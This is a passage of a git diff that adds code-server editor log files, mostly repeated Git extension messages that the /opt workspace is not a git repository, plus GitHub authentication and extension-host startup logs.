+Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.821 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 07:45:24.821 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.824 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:24.824 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.828 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:24.828 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.832 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:24.832 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.836 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:24.836 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.840 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:24.841 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.844 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:24.844 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.848 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:24.848 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.851 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:24.851 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.855 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:24.855 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.859 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 07:45:24.859 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:24.862 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-29 07:45:25.278 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 07:45:25.278 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:25.877 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:25.877 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:27.267 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 07:45:27.267 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:27.272 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:27.272 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:29.032 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 07:45:29.032 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:29.277 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 07:45:29.277 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 07:45:29.706 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 07:45:29.706 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 11:45:50.697 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 11:45:50.698 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 11:46:51.280 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 11:46:51.280 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 11:50:36.857 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 11:50:36.857 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 12:24:35.298 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 12:24:35.298 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:13:31.022 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:13:31.022 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:13:52.629 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:13:52.629 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:14:18.799 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:14:18.799 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:14:32.322 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:14:32.322 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:14:35.053 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:14:35.053 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:14:39.299 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:14:39.299 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:14:47.425 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:14:47.425 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:21:21.703 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:21:21.703 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:22:15.284 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 13:22:15.284 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:22:34.143 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:22:34.143 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:22:50.086 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:22:50.086 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:22:53.105 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:22:53.105 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:22:56.677 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:22:56.677 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:23:02.573 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:23:02.573 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:23:10.039 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:23:10.039 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:24:14.015 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:24:14.015 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:24:23.888 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:24:23.888 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:24:29.616 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:24:29.616 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:24:37.267 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:24:37.267 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:24:41.233 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:24:41.233 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:39:43.180 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:39:43.180 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:39:44.157 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:39:44.157 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:42:28.173 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:42:28.173 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:42:28.807 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:42:28.807 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:50:16.289 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:50:16.289 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:50:17.166 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:50:17.166 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:54:06.240 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:54:06.240 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:54:17.553 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:54:17.553 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:54:18.409 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:54:18.410 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:55:15.467 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 13:55:15.467 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 13:59:38.178 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 13:59:38.178 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:12:39.641 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:12:39.641 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:13:17.290 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:13:17.290 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:13:41.623 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 14:13:41.623 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:13:54.609 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 14:13:54.610 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:15:22.489 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 14:15:22.489 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:17:04.356 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:17:04.356 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:17:22.746 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 14:17:22.747 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:19:56.630 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:19:56.630 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:20:05.376 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:20:05.376 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:20:05.867 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 14:20:05.867 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:20:06.395 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:20:06.395 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:24:15.288 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:24:15.289 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:24:41.526 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:24:41.526 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:37:28.974 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:37:28.974 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:38:19.445 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:38:19.445 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:41:34.835 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 14:41:34.835 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:41:54.464 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:41:54.464 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:42:02.393 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:42:02.393 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:42:03.375 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 14:42:03.375 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:42:21.945 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:42:21.945 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:42:38.599 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:42:38.599 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:42:54.613 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:42:54.613 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:43:38.802 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:43:38.802 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:43:46.923 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:43:46.923 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:43:50.526 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:43:50.526 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:44:28.344 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 14:44:28.344 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:45:53.775 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:45:53.775 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:48:20.914 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:48:20.914 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:48:21.630 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:48:21.630 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:49:09.318 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:49:09.318 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:50:31.244 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:50:31.244 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:50:45.500 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:50:45.500 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:53:45.057 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:53:45.057 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:53:56.792 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 14:53:56.792 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:53:58.159 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:53:58.160 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:53:58.780 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:53:58.780 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:54:00.417 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:54:00.417 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:54:01.039 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 14:54:01.039 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 14:54:48.629 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 14:54:48.629 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 15:04:13.306 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 15:04:13.306 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 15:05:30.905 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 15:05:30.905 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 15:14:31.214 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 15:14:31.214 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 15:14:33.303 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 15:14:33.303 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 15:14:34.107 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 15:14:34.107 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 15:14:34.943 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 15:14:34.943 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 15:14:35.444 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 15:14:35.444 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 15:14:37.087 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 15:14:37.087 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..b1ae509 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,31 @@ +2026-01-29 07:45:24.800 [info] Reading sessions from keychain... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:24.800 [info] Getting sessions for all scopes... +2026-01-29 07:45:24.800 [info] Got 0 sessions for ... +2026-01-29 07:45:25.578 [info] Getting sessions for all scopes... +2026-01-29 07:45:25.578 [info] Got 0 sessions for ... +2026-01-29 07:45:30.278 [info] Getting sessions for all scopes... +2026-01-29 07:45:30.278 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github/GitHub.log new file mode 100755 index 0000000..1890768 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-29 07:45:25.086 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.html-language-features/HTML Language Server.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.html-language-features/HTML Language Server.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/remoteexthost.log new file mode 100755 index 0000000..5888b97 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/remoteexthost.log @@ -0,0 +1,11 @@ +2026-01-29 19:15:36.575 [info] Extension host with pid 104591 started +2026-01-29 19:15:36.582 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-29 19:15:36.691 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-29 19:15:36.692 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-29 19:15:36.859 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-29 19:15:36.908 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-29 19:15:36.909 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-29 19:15:37.064 [info] Eager extensions activated +2026-01-29 19:15:37.065 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-29 19:15:37.065 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-29 19:15:41.139 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.git/Git.log new file mode 100755 index 0000000..0ab765a --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.git/Git.log @@ -0,0 +1,179 